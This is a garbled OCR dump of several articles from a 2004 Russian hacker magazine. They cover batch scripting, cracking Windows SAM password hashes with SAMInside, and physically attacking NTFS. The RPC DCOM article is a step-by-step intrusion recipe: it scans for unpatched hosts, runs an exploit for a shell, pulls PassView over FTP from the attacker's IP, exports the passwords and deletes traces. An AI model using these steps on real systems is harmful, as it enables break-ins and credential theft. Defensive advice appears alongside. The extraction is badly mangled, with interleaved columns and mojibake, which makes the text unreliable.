Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

Специальный выпуск 48_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

9.21 Mб

Скачать

☆

<<< < Предыдущая 1 23 / 143 4 5 6 7 8 9 10 11 12 13 14 > Следующая >>>

			hang		e
		C			e	E
	X					E
	-					d
	F						t
	D						i
	D						r
P					NOW!		o
P
				BUY
			to	BUY
w Click			to				m
w Click							m
w

.					e REM проверяем наличие магического		можно предложить, – использовать
w						o
	p	df		g		.c
	p			g
			n
			-xcha		«пирожка», и, если его нет,		переменные окружения, а имеет
					«пирожка», и, если его нет,		переменные окружения, а имеет
						REM вызываем основной файл програм-	смысл передавать имя переменной
					мы, не забыв при этом		как аргумент, чтобы вызываемой и
						REM передать ему аргументы командной	вызывающей функциям было легче
					строки		"договориться", в противном случае
						IF NOT #%1#==#__666__# main.bat %1 %2	их будет трудно разрабатывать неза-
					%3 %4 %5 %6		висимо друг от друга. Посмотрим на
						REM если мы здесь, это значит, что нас	пример реализации:
					вызвали умышленно,
						REM а не случайно. А раз так - выкусы-	@ECHO OFF
					ваем магический		REM Менеджер вызова процедур
						REM «пирожок» и начинаем делать то,	REM ARG:
					что мы должны делать ;)		REM CALL %0 _call имя_метки_функции
						SHIFT	аргументы_функции....
							REM
						REM * * * тело программы * * *	:call_manager
						ECHO %1	IF NOT #%1#==#_call# GOTO call_manag-
							er_end
						К сожалению, командные файлы не	SHIFT
					поддерживают возможности вызова		SHIFT
					процедур (или, в терминологии Си,		GOTO %0
					функций), что затрудняет решение		:call_manager_end
					многих задач и вообще уродует прог-
					раммный листинг. Обычно в таких слу-		REM * Основное тело командного файла *
					чаях прибегают к вызову внешних ко-		:main
					мандных файлов, что также не есть		rem пример вызова функции
					хорошо, так как вспомогательные ко-		print_file_name
					мандные файлы смотрятся не очень		FOR %%A IN (.) DO CALL %0 _call
					красиво. Тем не менее, эта задача		print_file_name "%%A"
					вполне решаема. Пусть командный
					файл вызывает сам себя, передавая в		FIND/FINDSTR
					качестве аргумента имя метки, на ко-		Поиск двоичных данных (текстовых
					торую надо осуществить передачу уп-		строк) в группе файлов. Своеобраз-
					равления. Естественно, еще потребу-		ный аналог <ALT-F7> в FAR'е. Основ-
					ется включить в строку аргументов		ное оружие взломщика для поиска
					специальное ключевое слово, обоз-		интересных документов на сервере.
					начающее вызов функции, а в начало
					пакетного файла - особый обработ-		TIME
					чик, который при наличии этого само-		Задает текущее системное время, не
					го ключевого слова перехватывал бы		требуя прав администратора, что де-
					поток управления на себя и, сдвинув		лает ее самой деструктивной команд-
					список аргументов на две позиции		ной из всех представленных. Предс-
					влево, передавал бы управление на		тавь, что произойдет с документообо-
					указанную метку.		ротом и базой данных, если время
						Одна проблема – возврат значений.	окажется скачкообразно переведено
					Вероятно, единственное, что здесь		на несколько лет вперед!

Командный интерпретатор – слишком опасная штука, чтобы держать

его на своей машине.

XCOPY

Основное средство копирования файлов и подкаталогов из одной директории в другую.

ЗАЩИТА ОТ ВТОРЖЕНИЯ

Из всего вышесказанного можно сделать вывод, что командный интерпретатор – слишком опасная штука, чтобы держать его на своей машине. Но и удалить его мы не можем – перестанут работать некоторые инсталляторы и программы-оболочки (например, FAR). К тому же, оставлять себя без командой строки – это не выход. Может, попробовать переименовать его? Тогда атакующие программы останутся не у дел! Однако с легальными программами произойдет то же самое, поскольку они определяют имя командного интерпретатора по переменной COMSPEC, а она по умол- чанию указывает на C:\WINNT\System32\cmd.exe.

Попробуем переименовать cmd.exe в w2k_commander.exe, соответствующим образом скорректировав переменную COMSPEC. Кликнув по иконке "Мой компьютер" правой клавишей мыши, выберем в контекстном меню пункт "Свойства", в появившемся диалоговом окне ищем закладку "Дополнительно", а в ней – кнопку "Переменные среды". COMSPEC будет расположена среди системных переменных, и для ее изменения необходимы права администратора. Теперь напишем коротенькую программу, выводящую на экран предупреждение о хакерском вторжении, и переименуем ее в cmd.exe. Все!

При всей своей простоте предложенный прием необычайно эффективен. Хакеры и сетевые черви практи- чески никогда не анализируют переменную окружения COMSPEC, поскольку это требует определенного пространства для маневра, а в переполняющихся буферах оно не всегда есть. Вместо этого командный интерпретатор вызывается по его исходному имени cmd.exe, позволяя тем самым обнаружить атаку на самых ранних ее стадиях.

ЗАКЛЮЧЕНИЕ

Человеку, привыкшему к прелестям графических интерфейсов, командный интерпретатор на первых порах покажется жутко непроизводительным и неудобным. Однако со временем ощущение дискомфорта проходит и курсор начинает биться в такт сердцу компьютерщика :). Операции, ранее отнимавшие чудовищное количество времени, теперь выполняются одним легким пассом над клавиатурой. Известно много случаев, когда люди переходили с графических сред в консольные оболочки, но я не знаю ни одно поклонника командой строки, который променял бы ее на «интуитивно понятный» интерфейс Widows 2000/XP. E

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i	r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

hang

NOW!

BUY

АТАКА

ПОШАГОВАЯИМПЕРСОНАЛИЗАЦИЯ

w Click

Полуэктов Александр aka PolASoft (www.insidepro.com)

-xcha

	ND O W S	ПОШАГОВАЯ
	ÀÍ	ИМПЕРСОНАЛИЗАЦИЯ
	WI
	À Ê À	ВЗЛОМ АДМИНСКОГО ПАРОЛЯ В WINDOWS 2000/XP/2003
	À Ò	ВЗЛОМ АДМИНСКОГО ПАРОЛЯ В WINDOWS 2000/XP/2003
	À Ò
		ароль администратора - лакомый кусочек для хакера. Получив права админа, ты можно творить на взломанной
		Ïмашине что угодно.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	È	звестных способов
		взлома ОС Windows


		2000/XP/2003 доста-



		точно много. Вот ос-


		новные:

получение прав администратора путем восстановления пароля из SAM-базы

взлом через уязвимости в пакетах, установленных на компьютере: web-сервер (IIS, PWS, FrontPage server), FTP-сервер и т.д.

внедрение на компьютер троянов, кейлоггера и прочих шпионов

снифинг сети для перехвата паролей на вход в сеть (которые "по совместительству" являются и паролями на вход в ОС)

использование эксплоитов, реализующих дыры в сетевых протоколах или службах Windows

обход проверки правильности авторизации в ОС (к примеру, использование пропатченной версии библиотеки MSV1_0.DLL для Windows 2000)

Мы же остановимся на восстановлении пароля администратора из SAM-ба- зы, так как это один из самых распространенных методов, который, к тому же, не требует обширных знаний в области компьютерной безопасности. Но при реализации этого способа необходим физический доступ к компьютеру-клиенту.

Использование этих программ - простой и надежный способ получе- ния прав админа, но при этом теряется его оригинальный пароль. К сожалению, вмешательство вряд ли останется незамеченным для того, кто этот пароль установил :). Поэтому данный метод чаще используется не для доступа по чужому паролю, а для восстановления своего собственного забытого аккаунта.

Есть еще вариант удаления файлов SAM и SAM.LOG, которые в Windows NT приводят к тому, что можно войти в систему с пустым паролем и логином админа "по умолчанию". В Windows 2000/XP/2003 такой трюк не проходит, и ОС отказывается загружаться вообще или же использует для загрузки SAM-базу из резервных каталогов (типа \Windows\Repair). Но возможность подмены SAM-базы всетаки есть.

ПОЛУЧЕНИЕ ДОСТУПА К SAM-БАЗЕ

При попытке прочитать файл SAM (расположенный в каталоге C:\WINDOWS\System32\Config) ты получишь сообщение системы о нарушении доступа к файлу. Этот файл

(да и все остальные файлы без расширений из этого каталога) - фрагменты реестра, постоянно используемые системой, и только ОС имеет к ним доступ, причем монопольный. Кстати, именно из-за этого нет необходимости под Windows 2000/XP перезагружать программу после различных действий с реестром, так как все изменения вступают в силу моментально.

Тебе нужно получить к ним доступ не из самой ОС. Как же это сделать? Здесь два пути, и они отличаются в зависимости от файловой системы, которая установлена на системном диске с Windows. Если там FAT32, то доступ к базе можно получить даже с загрузочной дискеты, созданной в Windows 98, или с любой ОС, установленной как альтернативная на данном компьютере. Загружаемся с дискеты и обыкновенной DOS-командой COPY копируем SAM-базу в другое место, не забывая про файл SYSTEM, в котором хранится ключ SYSKEY.

Если же там NTFS, то необходима возможность загрузки со специальной дискеты. А в BIOS нужно установить соответствующую последовательность загрузки системы: сначала

МЕТОДЫ "ЧЕРНОГО" ВЗЛОМА

Для начала рассмотрим методы получения доступа к аккаунту администратора, не восстанавливая его пароль, а обнуляя его или устанавливая новый. Наиболее часто при полном доступе к SAM-базе меняются логины и пароли напрямую, что позволяет, даже не зная пароля админа, обнулить его в SAM-базе и войти в систему с пустым паролем. Для этого нужна одна из следущих программ:

CIA Commander (www.datapol.de)

ERD Commander (www.winternals.com)

Offline NT Password & Registry Editor (www.home.eunet.no/~pnordahl/ ntpasswd/)

ряд Linux-утилит для доступа к SAM-базе, когда на машине установлены две ОС - Windows и Linux

Если там FAT32, то доступ к базе можно получить даже с загрузочной дискеты, созданной в Windows 98.

Загрузка хэшей в SAMInside

ХАКЕРСПЕЦ 11(48) 2004

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							с флоппи-диска, затем все остальное.
	.							.c
		p					g
			df			n		e
				-xcha

На вход в BIOS стоит пароль? Обнуляем его перемычками на материнской плате или же пробуем вводить пароли, зарезервированные разработчи- ком BIOS для супервизорского входа. Далее на любой другой машине запускаем утилиту bootdisk.exe из пакета NTFSDos Pro (www.winternals.com) и создаем с ее помощью загрузочный диск, который позволит "подмонтировать" NTFS-разделы и "увидеть" их из-под DOS. Затем останется скопировать SAM/SYSTEM-файлы в другое место (можно на дискету, используя любой DOS-архиватор).

ТРЕПАНАЦИЯ SAM-БАЗЫ

В итоге, после всех манипуляций файлы SAM и SYSTEM надо загрузить в специальную программу, к примеру SAMInside (www.insidepro.com), и можно начинать восстанавливать пароли.

Попробуем на практике с помощью SAMInside восстановить пароли из SAM-базы, например, с такими хэшами:

Администратор:500:0000000000000000000000000000 0000:62781BD14D85006B4734E2857B47019F:::

Гость:501:

00000000000000000000000000000000:31D

6CFE0D16AE931B73C59D7E0C089C0::: Ìàñ-

òåð:1000:DAB56D929B00DB039D4BD15CFFF0E2

0C:B66B458E27BD714F99A05EE3C479FBF1:::

Èâàí:1001:598DDCE2660D3193AAD3B435B514

04EE:2D20D252A479F485CDF5E171D93985BF:::

Goblin:1002:0BC8D36E4D78246AAAD3B435B5

1404EE:1E1DD34B128DE1968A44212E05D9E942:::

petya1980:1003:4E6F46C1D006F762A91E5487

19C3AC6E:DB1D4EAECA820233B92708593BE4E

092:::

Xen:1004:D1919E5054AE7CC7EFD3963F3DD00

D8A:30F88284912BA9F7973D18EB2DC5DDDD:::

neo:1005:1DFF40B5A5703497B6CF57A62BF8

D92D:AEA36890BB36AA0F51628AB08759AB31:::

Выводы:

- администратор не совсем глуп и сделал пароль с длиной более 14 символов

(это видно из того, что LM-пароль отключен, хотя NT-пароль присутствует);

-учетная запись гостя или отключе- на вообще и не используется, или же позволяет войти с пустым паролем;

-пользователь «Иван» не стал думать над паролем и ввел самую популярную клавиатурную комбинацию (исключая Ctrl+Alt+Del, конечно) - "qwerty";

ХРАНЕНИЕ ПАРОЛЕЙ

Статей об основах хранения паролей в Windows 2000/XP и о SAM-базе в сети лежит куча, поэтому не будем подробно на этом останавливаться. Напомним лишь, что в Windows NT+SP3/2000/XP/2003 используется системный ключ SYSKEY, с помощью которого дополнительно шифруются уже зашифрованные хэши. Фактически в SAM-базе хранятся не хэши паролей, а хэши хэшей паролей. Ключ SYSKEY - это 16 байт из определенных четырех ключей реестра, расположенных в файле SYSTEM (который, как и SAM, является частью реестра Windows). Для входа в Windows используется два типа паролей: LM-пароль и NT-пароль, зашифрованные разными алгоритмами.

Но тем, кто не знает о хранении паролей в SAM-базах и алгоритмах шифрования, которыми шифруются LM-пароли и NT-пароли, советуем прочитать статью с www.insidepro.com/doc/002r.shtml.

-пользователь "petya1980" сделал еще проще: он использовал в качестве пароля свой логин;

-также видно, что программа SAMInside моментально нашла два окончания паролей - 33 и 567890 еще для двух пользователей.

Для начала неплохо! Стоит заметить, что данная функция SAMInside ("интеллектуальная" загрузка хэшей) позволяет моментально оценить уровень квалификации пользователей на данном компьютере, и по статистике 5-10% паролей (или окончаний паролей) восстанавливаются уже на этапе загрузки хэшей.

Итак, начинаем анализ. Самый продуктивный алгоритм восстановления паролей - перебор нескольких методик по возрастанию их времени работы, ориентируясь на планируемую сложность паролей.

1. Видно, что в паролях есть циф-

ры, поэтому начнем с перебора по цифрам.

Устанавливаем перебор по LM-хэ- шам, алфавит - только цифры, очи- щаем начальный пароль (поле "Пароль") и запускаем перебор.

Через несколько секунд восстановился один пароль, полностью состоящий из цифр - 111222333. Неплохо. »

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha
	W I N D O W S
	Í À
	À Ò À Ê À

hang

NOW!

АТАКА

ПОШАГОВАЯИМПЕРСОНАЛИЗАЦИЯ

BUY

w Click

ЗАМЕНА SAM-БАЗЫ

-x cha

2. Теперь начинаем перебор по словарю. Для этого нужно скачать словарь с www.insidepro.com/download/dictionary.zip, добавив в список, и запустить перебор. Не забываем включить флажки для проверки паролей, состоящих из двойных паролей и из паролей с обратным порядком букв. Через несколько минут мы получим результат.

Для дешифрования паролей Windows необходим еще и ключ SYSKEY. Поэтому замена SAM-базы на файл с другого компьютера приведет к тому, что, возможно, ОС и будет загружаться, но далее окна ввода пароля ты не пройдешь, так как пароли в разных SAMбазах зашифрованы разными SYSKEY-ключами. Но на компьютеры одной крупной поставки для сокращения времени на установку Windows обычно применяют либо уже готовые CD-образы установленной ОС, либо используют программы для клонирования установки Windows одновременно на большое количество машин. В этом случае ключи SYSKEY на всех этих машинах будут ОДИНАКОВЫМИ (еще одна недоработка Microsoft).

Таким образом, если у тебя и у твоего коллеги по работе машины из одной поставки и ОС не переустанавливалась, то можешь попробовать скопировать на его машину свои файлы SAM и SAM.LOG (предварительно сохранив оригиналы) и попытаться войти в систему со своим аккаунтом.

3.Пробуем на зуб пароль пользователя neo. Как видно, пароль закан- чивается на комбинацию 567890, на- чало же неизвестно. Но можно предположить, что первая половина пароля заканчивается на 4 или даже 34. А можно сразу попробовать 1234 :). Открываем настройки атаки по маске и вводим маску.

Ура! Пароль найден - neo1234567890. Если бы мы не нашли пароль, то имело бы смысл попробовать окончание пароля на 4, 34 или 234. Или запустить перебор с символами A...Z и 0...9.

4.Остался пароль администратора. По LM-хэшам его восстановить не полу- чится - только по NT-хэшам. А это практически бесполезное дело, так как NTпароль регистрозависимый и даже для анализа паролей только из латиницы придется использовать два алфавита: A...Z и a...z. Но напоследок попробуем гибридную атаку. Укажем, что к паролям из словаря нужно добавлять до 2 символов справа и слева (при этом флажки для сдвоенных паролей и паролей с обратным порядком букв снимаем - мы их уже проверили). Запускаем программу и идем за пивом, так как гибридная атака - процесс длительный. Через некоторое время мы увидим, что пароль все-таки найден - administrator$$.

В итоге, мы имеем 100% восстановленных паролей. Конечно, данные пароли приведены лишь для примера, но,

МЕТОДЫ ВОССТАНОВЛЕНИЯ ПАРОЛЕЙ

Существует несколько методов восстановления паролей:

Атака полным перебором - самый распространенный метод: просто перебираются подряд все пароли, состоящие из символов какоголибо алфавита.

Атака по маске - очень эффективный вид атаки, если имеется определенная информация о пароле, например, что он состоит из 10 символов и заканчивается на "admin" или же первые 5 символов - цифры, а последующие - символы из набора A...Z и т.д.

Атака по словарю - достаточно эффективный и очень быстрый вид атаки, при котором проверяются пароли из так называемых словарей - текстовых файлов, в которых собраны часто используемые слова, словосочетания, соседние комбинации символов на клавиатуре и т.п.

Гибридная атака - тоже достаточно эффективный вид атаки, дающий возможность при переборе по словарю добавлять слева и справа к проверяемым паролям от 1 до 3 символов, что позволяет находить пароли вида master## или _admin_.

Атака распределенным перебором - "распараллеливание" процесса перебора на несколько компьютеров, что позволяет сократить время перебора (сколько компьютеров, во столько раз быстрее перебор).

Атака по pre-computed хэшам - набирающий обороты новый вид атаки, применяемый в программе LC5 и ряде других. Основан на создании так называемых Rainbow-таблиц (смотри проект www.antsight.com/zsl/rainbowcrack) - огромных (сотни мегабайт и десятки гигабайт), заранее рассчитанных таблиц соответствий "Пароль = Хэш". Позволяет восстанавливать быстро несложные пароли. Время восстановления - время поиска хэша в таблице (базе данных) для получения пароля, который соответствует этому хэшу. Но объем таблицы не бесконечен, и восстановить длинные пароли этим методом невозможно.

как показывает практика, до 95-98%	шего объема. А при наличии любой
паролей восстановить все-таки можно.	предварительной информации о паро-
Лучше всего применять поочередно	ле использовать ее максимально эф-
различные виды атак и словари боль-	фективно! Конечно, пароли вида

ХАКЕРСПЕЦ 11(48) 2004

hang

NOW!

BUY

w Click

ПРОГРАММЫ ДЛЯ РАБОТЫ С SAM-БАЗАМИ

-xcha

SAMInside (shareware, www.insidepro.com)

Особенности:

-многоязычный интерфейс (в том числе русскоязычный)

-декодирует хэши, зашифрованные ключом SYSKEY

-небольшой размер

-высокая скорость перебора среди аналогов (перебор по LM-хэ- шам на AthlonXP 1700+ происходит со скоростью 5,7 миллионов паролей в секунду, а перебор одного NT-хэша - до 9,8 миллионов паролей в секунду)

-не требует инсталляции и может работать с дискеты или CD

LC4/LC5 (shareware, www.atstake.com)

Особенности:

-англоязычный интерфейс

-работа с pre-com- puted таблицами

-встроенные средства для снифинга паролей (перехвата паролей из сетевого трафика) и их восстановления

LC4/LC5

Proactive Windows Security Explorer (shareware, www.elcomsoft.com)

Особенности:

-англоязычный интерфейс

-декодирует хэши, зашифрованные ключом SYSKEY

LC+4.02 (freeware,

www.lcp.nm.ru)

Особенности:

- русскоязычный Proactive Windows Security Explorer

интерфейс

-широкие возможности гибридной атаки

-распространяется бесплатно

BKHive è SAMDump2 (freeware, www.studenti.unina.it/~ncuomo/syskey/)

Эти консольные программы не предназначены для восстановления паролей, они используются лишь для получения хэшей. BKHive из SYSTEM-файла извлекает 16 байт ключа SYSKEY и сохраняет их в бинарном файле. SAMDump2 из SAM-файла извлекает хэши, используя для декодирования SYSKEY как раз этот бинарный файл.

lb&z(4VMmcx{`j[P% восстановить практически невозможно, но ведь есть еще и человеческий фактор, социальная инженерия и т.п. Так что иногда можно узнать пароль и без SAM-базы.

Очевидно, что восстановление паролей - процесс творческий и требует хорошей интуиции. Любое окончание

пароля (если он длиннее 7, но короче 14 символов), будучи найденным в первую очередь, дает обильную пищу для размышлений. Алгоритмов, по которым пользователи формируют свои пароли, на самом деле не так уж и много. Так что анализ, анализ и еще раз анализ! E

hang

NOW!

BUY

w Click

-x cha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha
	W I N D O W S
	Í À

24 АТАКА RPCDCOMДЛЯМЛАДШЕГОБРАТИКА

Наумов Юрий aka Crazy_Script (crazy_script@vr-online.ru)

RPC DCOM ДЛЯ МЛАДШЕГО БРАТИКА

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

À Ò À Ê À

ПОПУЛЯРНАЯ ЭКСПЛУАТАЦИЯ ИЗВЕСТНОГО БАГА

Íе так давно RPC-уязвимость гремела на весь мир. Повальные взломы, MSBlast, снова повальные взломы. На эту тему написана куча статей и мануалов. Тем не менее, остаются еще те, кто не пропатчил свою систему и не установил даже

персональный фаервол.

ТЕОРИЯ

» RPC (Remote Procedure Call - удаленный вызов процедур) - это механизм, позволя-

ющий программе на одном компьютере выполнять некий код на удаленной машине. Компания Sun Microsystems была одной из первых, реализовавших эту службу. RPC базировалась на протоколе внешней передачи данных XDR (eXternal Data Representation). Все это Sun делала для того, чтобы обеспечить взаимодействие сетевой информационной службы и файловой системы. После первого шага компании службы RPC стали использоваться и в продуктах семейства UNIX,

àпозже – в Windows.

Баг был обнаружен в июле 2003 го-

да в продуктах Microsoft Windows NT/2000/XP/2003 польскими экспертами Last Stage of Delirium. Тогда можно было завалить невероятное коли- чество серверов, ведь лишь малая их часть блокировала входящие пакеты на порт 135, через который осуществлялась атака. Буквально сразу же стало известно, что уязвимы все сервисы RPC, а это еще 139-й, 445-й и 593-й порты. Если бы в то время выпустили публичный эксплоит, произошла бы катастрофа. Но его не было, и сетевая общественность продолжала жить спокойно, не задумываясь об этой дырке.

Но так не могло долго продолжаться. В конце июля того же года появилось техническое описание уязвимос-

ти, стали появляться эксплоиты и возникла глобальная угроза MSBlast.

EXPLOIT’АЦИЯ БАЖНОЙ ТАЧКИ

Осуществить RPC DCOM-атаку может любой. Для этого, с позволения сказать, «взлома» нам необходимы:

1.RPC GUI Exploit, написанный че- ловеком по имени r3l4x. Точнее сказать, им написана только графическая оболочка, сам же сплоит принадлежит ребятам из LSD Security Group.

2.KAHT2 для поиска бажной тачки (если надо ее искать).

3.Какая-нибудь программа для заимствования паролей и прочей вкусности. Например, PassView 1.5.

Итак, начнем. Самое главное - найти непропатченную тачку. Для этого нам

èнужен КАНТ2. Пример:

C:\xtools\kaht2 10.0.0.1 10.0.0.255 500

Значение threads, стоящее после диа-

пазона IP, можно поставить и 100, и 80 - кому как удобнее (по умолчанию 50).

Запускаем GUI RPC Exploit. Вводим айпишник, который нам выдал КАНТ,

èжмем Test. Должно высветиться «Connected!». Переходим во вкладку FTP Server и жмем старт, затем - во вкладку Exploit. Нажимаем «Exploit!»,

èнашему взору открывается шелл. Вот что должно получиться после запуска сплоита:

--w00t --

Microsoft Windows XP [Version 5.1.2600]

C:\WINDOWS\system32>

Хочу заметить, что мы имеем возможность выбора удаленной ОСи (Win200[All] или WinXP[All]). Возникает вопрос: а что если на удаленной машине с открытым 135-м портом стоит WinNT? Для этого к сплоиту прилагается список возвращаемых адресов (файл RET.txt). Все, что требуется, - найти в этом списке нужную версию

А вот и непропатченная тачка!

www.securitylab.ru/_exploits/kaht2.zip - сканер для обнаружения бага

www.securitylab.ru/_tools/PTms03039.zip - утилита от PT для проверки локальной сети на баг

www.security.nnov.ru/search/news.asp?binid=2988&l=RU - все разновидности эксплоитов и оригинальные тексты

www.securitylab.ru/_tools/RPC2.zip - GUI PRC EXploit v2 by r3l4x

www.web-hack.ru/download/info.php?go=44 - PassView v1.5 www.microsoft.com/technet/security/bulletin/MS03-026.asp -

ïàò÷ îò ÌÑ

ХАКЕРСПЕЦ 11(48) 2004

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.							ОСи и вписать адрес в соответствую-
	.							.c
		p					g
			df			n		e
				-xcha

щую строку Return Adress.

Итак, мы получили доступ. Теперь наша цель - закачать файлы passview.exe и export.bat (оба из ска- чанной ранее PassView 1.5). Для этого стартуем ftp:

c:\WINDOWS\system32>ftp ftp

open 194.XX.XX.XX // наш IP (смотрим в GUI PRC Exploit во вкладке FTP Server)

user <194.XX.XX.XX:<none>>: asdf // asdf - логин по умолчанию, можно изменить в той же вкладке FTP Server

get /xtools/passview.exe // закачиваем файл из папки C:\xtools

get /xtools/export.bat

!export.bat // запускаем export.bat на удаленной тачке

put export.txt // забираем полученное

В файле export.txt будут все пароли, которые должна была достать программа PassView. Осталось только замести следы:

del export.bat del export.txt del passview.exe

ИНТЕРВЬЮ С ПРОФЕССИОНАЛОМ

Об уязвимости службы RPC мы поговорили со спецом в области компьютерной безопасности, руководителем популярного сайта securitylab.ru Александром Антиповым.

XS: На твой взгляд, сейчас еще актуальна проблема бага RPC/DCOM?

AA: Баг актуален при включении в сеть только что купленных компьютеров с предустановленной Windows. К сожалению, практи- чески всегда продавцы компьютеров не заботятся об установке последней версии операционной системы. С выходом SP2 для Windows XP проблема решится, но не сразу. Еще, я думаю, пройдет не менее 3 месяцев до массового появления в продаже OEM версий Windows с включенным SP2.

XS: Расскажи читателям кратко о коварных багах RPC.

AA: Самая первая уязвимость (и самая опасная!) была обнаружена в июле 2003 года (описано в бюллетене безопасности MS03026). Эту уязвимость эксплуатирует самый разрушительный червь за всю историю существования интернета - MSBlast. Спустя неделю после выхода MS03-026 китайцы сообщили еще об одной уязвимости в DCOM при обработке __RemoteGetClassObject, которая позволяла выполнить отказ в обслуживании даже при установленной заплате MS03-026. Данную уязвимость компания Microsoft устранила только через 2 месяца в совокупности с двумя новыми уязвимостями (MS03-039), позволяющими атакующему выполнить произвольный код на уязвимой системе, используя специально сформированный DCERPC "bind" пакет, за которым следует специально сформированный пакет DCOM object activation request. Однако на этом история не закончилась. Буквально через месяц впервые на сайте SecurityLab.ru был опубликован новый эксплоит, который вызывал отказ в обслуживании даже при установленной заплате MS03-039. Удаленный атакующий мог вызвать отказ в обслуживании (аварийное завершение работы системы или перезагрузка), создавая два потока для одного и того же RPC-запроса. Изначально предполагалось, что уязвимость может эксплуатироваться только для отказа в обслуживании, однако спустя полгода Microsoft наконец-то опубликовала исправление для этой уязвимости (MS04-012), в котором утверждалось, что она может эксплуатироваться для выполнения произвольного кода. В MS04-012 также было устранено еще три уязвимости в RPC DCOM: RPCSS Service Vulnerability, CAN-2004-0116, RPC over HTTP Vulnerability - CAN-2003-0807, Object Identity Vulnerability - CAN-2004-0124.

XS: А какой, на твой взгляд, самый эффективный и оптимальный способ защиты?

AA: Заплата, персональный фаервол. В большинстве случаев можно безболезненно отключать RPC DCOM.

Разумеется, это только приблизительный план действий.

DEFENCE

А теперь про защиту. Можно по старинке отключить DCOM: лезем в реестр в HKEY_LOCAL_MACHINE\Software\Micr osoft\OLE и изменяем значение EnableDCOM с "Y" на "K".

Есть еще способ через утилиту dcomcnfg.exe (меню Пуск -> Выполнить), но проще всего блокировать входящие пакеты на порты 135, 139, 445 и 593 и установить патчи, а главное - SP2.

Кстати, вот что говорит Microsoft по поводу отключения DCOM: «Если вы отключаете DCOM, вы можете потерять функциональные возможности операционной системы. После того как вы отключаете поддержку DCOM, может случиться следующее. Любой COM-объект, который может быть активирован дистанционно, перестанет работать. Локальный COM+ snap-in не сможет подключаться к удаленным серверам. Функция авторегистрации сертификатов может неправильно функционировать. Запросы Windows Management Instrumentation (WMI) удаленных серверов могут неправильно функционировать. Потенциально существует множество встроенных компонентов и сторонних приложений, которые могут перестать работать, если вы отключите DCOM. Microsoft рекомендует проверить работоспособность всех приложений, используемых в вашей среде, после отключения DCOM. Microsoft также предупреждает, что не во всех средах можно отключить DCOM». E

Отключаем DCOM

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha
								W I N D O W S
								Í À
								À Ò À Ê À

25 èþëÿ

2003 года - переломный момент в эксплуатации RPC: техническое описание бага, множество сплоитов, MSBlast.

Автор статьи и редакция журнала не несут никакой ответственности за действия, совершенные читателем. Вся информация дана в сугубо образовательных целях.

MSBlast - червь на основе бага RPC DCOM - стал самым разрушительным за всю историю интернета.

hang

NOW!

BUY

АТАКА

ЧЕРЕЗОБРАЗЫКСЕРДЦУ

w Click

Анализирующий (analyst1945@mail.ru)

ЧЕРЕЗ ОБРАЗЫ

-xcha

O W S

À W I N D

К СЕРДЦУ

Ê À

АТАКА НА NTFS

Ò À

оступ к данным компьютера под управлением ОС Windows можно получить многими способами.

ÄОдним из них является атака на последний рубеж защиты данных - на файловую систему NTFS.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

способы

чтения NTFS не являются панацеей. NTFS поддерживают многие ОС, в том числе различные дистрибутивы Linux, Lindows, BeOS, загружаемые также с CD/DVD.

ласть над NTFS дает

возможности баналь-

Если загрузка с внешнего устройства

ного копирования/под-

тановки шпионских

прошла нормально и стали доступны

мены информации, ус-

все разделы жесткого диска, тебе остается

программ, изменения настроек и полу-

чения нужного аккаунта заменой

слить нужную информацию, произвести

SAM-файла. Для осуществления ата-

необходимые действия

ки на NTFS необходимо иметь физи-

ческий доступ к интересуемому объ-

и быстро уносить ноги.

екту (компьютеру). При этом неважно,

как ты этот доступ получишь: вор-

приоритетную загрузку с нужного ти-

вешься ночью в здание с чулком на

кое), спасет крестовая отвертка. А

голове, напоишь админа до беспамят-

дальше просто – сбрасываешь наст-

па носителя. Загружаешь с диска опе-

ства или же просто устроишься на ра-

ройки BIOS, замкнув соответствую-

рационную систему, поддерживаю-

боту уборщиком, разыграв из себя

щие контакты на материнской плате,

щую NTFS. Далее действуешь на свое

имбецилла в пятом поколении. Глав-

подключаешь девайс в качестве заг-

усмотрение.

ное, иметь возможность считывать

рузочного и по плану. Но вскрытие

(записывать) данные со своих носите-

занимает больше времени, сопровож-

ВАРИАНТ ВТОРОЙ

лей и/или подключать внешние.

дается грохотом и скрипом.

На компьютере присутствует ка-

Правда, при грамотном подходе сис-

кой-либо дисковод. Установлен па-

темного администратора к защите

ВАРИАНТ ПЕРВЫЙ

роль на BIOS. Доступна загрузка ОС

данных ты не обнаружишь каких-либо

На компьютере присутствует ка-
